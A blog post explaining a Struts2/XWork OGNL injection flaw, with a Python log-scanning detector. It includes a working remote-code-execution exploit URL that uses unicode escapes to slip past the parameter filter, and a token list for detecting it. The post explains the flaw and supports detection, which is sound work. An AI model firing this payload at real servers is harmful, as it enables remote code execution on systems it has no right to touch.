An Interesting Struts2/XWork Security Vulnerability

This is an interesting (at least to me) vulnerability that is reported to affect Struts2/XWork versions below 2.2. Since Struts2/XWork is so widely used, I think it is worth mentioning here. It lets an attacker run arbitrary code on the server simply by placing specially crafted text in the URL. The example below calls System.exit(1) on the server, but almost anything else can be run the same way. The root cause is that Struts2 evaluates request parameter names as OGNL expressions; it should not be considered an OGNL bug as such. The parameter-name filter rejects characters such as '#', but OGNL also accepts Java-style unicode escapes, so \u0023 passes the filter and is still interpreted as '#' (and \u003d as '='). With that, the payload flips the two guards that normally block static method calls, #_memberAccess['allowStaticMethodAccess'] and #context['xwork.MethodAccessor.denyMethodExecution'], and then calls @java.lang.Runtime@getRuntime().exit(1).

Unfortunately, I don't have a live Struts2/XWork application to test with, so I have not verified it myself. If you happen to have the environment, you may try the following in your URL:

http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
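As an added example (not part of the original post or of the exploit-db entry), here is a small Python detector a defender could run over web-server access logs to spot this class of payload. It assumes combined-log-format lines and uses constructed sample entries; the malicious line is the payload above with its double quotes percent-encoded as %22, the way a web server would log them. The important step is that it decodes both percent-encoding and \uXXXX escapes in the parameter names before matching, because those escapes are exactly what lets the payload past the parameter-name filter. The token list and log regex are my own choices, not anything from Struts2.

```python
"""Detect Struts2/XWork OGNL parameter-name injection in web access logs."""
import re
from urllib.parse import unquote

# Fragments that have no business in a parameter name and only show up
# when someone is driving OGNL through ParametersInterceptor.
SUSPICIOUS_TOKENS = (
    "#_memberAccess",
    "#context",
    "allowStaticMethodAccess",
    "denyMethodExecution",
    "@java.lang.Runtime@",
)

# Java/OGNL unicode escape, e.g. \u0023 for '#', \u003d for '='.
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Request line of a combined-format access log: method, path, optional query.
LOG_LINE = re.compile(
    r'"(?:GET|POST) (?P<path>[^ ?]+)(?:\?(?P<query>[^ "]*))? HTTP/'
)


def normalize(name: str) -> str:
    """Undo the layers an attacker stacks on a parameter name.

    1. URL percent-decoding (%20 -> space, %5C -> backslash).
    2. Unicode escapes (\\u0023 -> '#'), applied after step 1 so that a
       percent-encoded backslash is also caught.
    """
    decoded = unquote(name)
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)


def parameter_names(query: str) -> list:
    """Decoded parameter names of a query string.

    Split on '&' and on the first '=' only, so the name is exactly the
    text that ParametersInterceptor would hand to OGNL.
    """
    names = []
    for pair in query.split("&"):
        if pair:
            names.append(normalize(pair.split("=", 1)[0]))
    return names


def find_ognl_injection(query: str) -> list:
    """Return (decoded_name, matched_token) for each suspicious name."""
    hits = []
    for name in parameter_names(query):
        for token in SUSPICIOUS_TOKENS:
            if token in name:
                hits.append((name, token))
                break
    return hits


def scan_log(lines):
    """Yield (line_number, path, hits) for log lines carrying an injection."""
    for lineno, line in enumerate(lines, 1):
        m = LOG_LINE.search(line)
        if not m or not m.group("query"):
            continue
        hits = find_ognl_injection(m.group("query"))
        if hits:
            yield lineno, m.group("path"), hits


# Constructed sample log: one benign request, one carrying the payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jul/2010:10:01:02 +0000] '
    '"GET /MyStruts.action?name=bob&age=3 HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Jul/2010:10:01:09 +0000] "GET /MyStruts.action?'
    r"('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true"
    r"&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')"
    r"(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))"
    r"&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1"
    ' HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for lineno, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {path}")
        for name, token in hits:
            print(f"  matched {token!r} in parameter name {name!r}")
```

Matching on decoded names rather than on the raw request line is the point: a rule that greps for "#_memberAccess" never fires on this payload, because the '#' only exists after the \u0023 escape is resolved.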

The exploit-db entry: http://www.exploit-db.com/exploits/14360/

The article (in Chinese): http://neeao.com/archives/59/